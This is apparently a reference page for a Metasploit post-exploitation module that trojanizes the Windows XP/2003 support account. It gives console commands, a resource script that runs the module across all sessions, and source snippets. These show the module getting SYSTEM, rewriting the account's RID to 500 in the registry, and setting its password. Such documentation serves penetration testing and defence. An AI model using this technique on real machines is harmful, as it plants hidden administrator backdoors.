Windows Manage Trojanize Support Account - Metasploit


This page contains detailed information about how to use the post/windows/manage/enable_support_account metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Manage Trojanize Support Account
Module: post/windows/manage/enable_support_account
Source code: modules/post/windows/manage/enable_support_account.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module enables alternative access to servers and workstations by modifying the support account's properties. It will enable the account for remote access as the administrator user while taking advantage of some weird behavior in lusrmgr.msc. It will check if sufficient privileges are available for registry operations, otherwise it exits.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/manage/enable_support_account

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/manage/enable_support_account
msf post(enable_support_account) > show options
    ... show and set options ...
msf post(enable_support_account) > set SESSION session-id
msf post(enable_support_account) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/manage/enable_support_account")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/manage/enable_support_account post exploitation module looks in the msfconsole:

msf6 > use post/windows/manage/enable_support_account

msf6 post(windows/manage/enable_support_account) > show info

       Name: Windows Manage Trojanize Support Account
     Module: post/windows/manage/enable_support_account
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  salcho <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  GETSYSTEM  false            yes       Attempt to get SYSTEM privilege on the target host.
  PASSWORD   password         yes       Password of the support user account
  SESSION                     yes       The session to run this module on.

Description:
  This module enables alternative access to servers and workstations 
  by modifying the support account's properties. It will enable the 
  account for remote access as the administrator user while taking 
  advantage of some weird behavior in lusrmgr.msc. It will check if 
  sufficient privileges are available for registry operations, 
  otherwise it exits.

Module Options


This is a complete list of options available in the windows/manage/enable_support_account post exploitation module:

msf6 post(windows/manage/enable_support_account) > show options

Module options (post/windows/manage/enable_support_account):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   GETSYSTEM  false            yes       Attempt to get SYSTEM privilege on the target host.
   PASSWORD   password         yes       Password of the support user account
   SESSION                     yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/manage/enable_support_account post exploitation module:

msf6 post(windows/manage/enable_support_account) > show advanced

Module advanced options (post/windows/manage/enable_support_account):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/manage/enable_support_account module can do:

msf6 post(windows/manage/enable_support_account) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/manage/enable_support_account post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/manage/enable_support_account) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to get system! You need to run this script.


Here is a relevant code snippet related to the "Unable to get system! You need to run this script." error message:

42:	    unless (is_system?())
43:	      if (datastore['GETSYSTEM'])
44:	        print_status("Trying to get system...")
45:	        res = session.priv.getsystem
46:	        unless res[0]
47:	          print_error("Unable to get system! You need to run this script.")
48:	          return
49:	        else
50:	          print_good("Got system!")
51:	        end
52:	      else

You need to run this script as system!


Here is a relevant code snippet related to the "You need to run this script as system!" error message:

48:	          return
49:	        else
50:	          print_good("Got system!")
51:	        end
52:	      else
53:	        print_error("You need to run this script as system!")
54:	        return
55:	      end
56:	    end
57:	
58:	    wver = sysinfo()["OS"]

<WVER> is not supported


Here is a relevant code snippet related to the "<WVER> is not supported" error message:

55:	      end
56:	    end
57:	
58:	    wver = sysinfo()["OS"]
59:	    if wver !~ /Windows XP|Windows .NET|Windows 2003/
60:	      print_error("#{wver} is not supported")
61:	      return
62:	    end
63:	
64:	    print_status("Target OS is #{wver}")
65:	    names_key = registry_enumkeys(reg_key + '\\Names')

Couldn't access registry keys


Here is a relevant code snippet related to the "Couldn't access registry keys" error message:

62:	    end
63:	
64:	    print_status("Target OS is #{wver}")
65:	    names_key = registry_enumkeys(reg_key + '\\Names')
66:	    unless names_key
67:	      print_error("Couldn't access registry keys")
68:	      return
69:	    end
70:	
71:	    rid = -1
72:	    print_status('Harvesting users...')

Couldn't open user's key


Here is a relevant code snippet related to the "Couldn't open user's key" error message:

73:	    names_key.each do |name|
74:	      if name.include? 'SUPPORT_388945a0'
75:	        print_good("Found #{name} account!")
76:	        skey = registry_getvalinfo(reg_key + "\\Names\\#{name}", "")
77:	        if not skey
78:	          print_error("Couldn't open user's key")
79:	          return
80:	        end
81:	        rid = skey['Type']
82:	        print_status("Target RID is #{rid}")
83:	      end

Couldn't get user's RID...


Here is a relevant code snippet related to the "Couldn't get user's RID..." error message:

82:	        print_status("Target RID is #{rid}")
83:	      end
84:	    end
85:	
86:	    if rid == -1
87:	      print_error("Couldn't get user's RID...")
88:	      return
89:	    end
90:	
91:	    users_key = registry_enumkeys(reg_key)
92:	    users_key.each do |r|

Target account is already enabled


Here is a relevant code snippet related to the "Target account is already enabled" error message:

95:	      f = registry_getvaldata(reg_key + "\\#{r}", "F")
96:	      if check_active(f)
97:	        print_status("Account is disabled, activating...")
98:	        f[0x38] = ["10"].pack("H")
99:	      else
100:	        print_error("Target account is already enabled")
101:	      end
102:	
103:	      print_status("Swapping RIDs...!")
104:	      # Overwrite RID to 500 (as administrator)
105:	      f = swap_rid(f, 500)

Can't write to registry... Something's wrong!


Here is a relevant code snippet related to the "Can't write to registry... Something's wrong!" error message:

104:	      # Overwrite RID to 500 (as administrator)
105:	      f = swap_rid(f, 500)
106:	
107:	      open_key = registry_setvaldata(reg_key + "\\#{r}", "F", f, "REG_BINARY")
108:	      unless open_key
109:	        print_error("Can't write to registry... Something's wrong!")
110:	        return
111:	      end
112:	
113:	      print_status("Setting password to #{datastore['PASSWORD']}")
114:	      cmd = cmd_exec('cmd.exe', "/c net user support_388945a0 #{datastore['PASSWORD']}")

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


salcho <salchoman[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.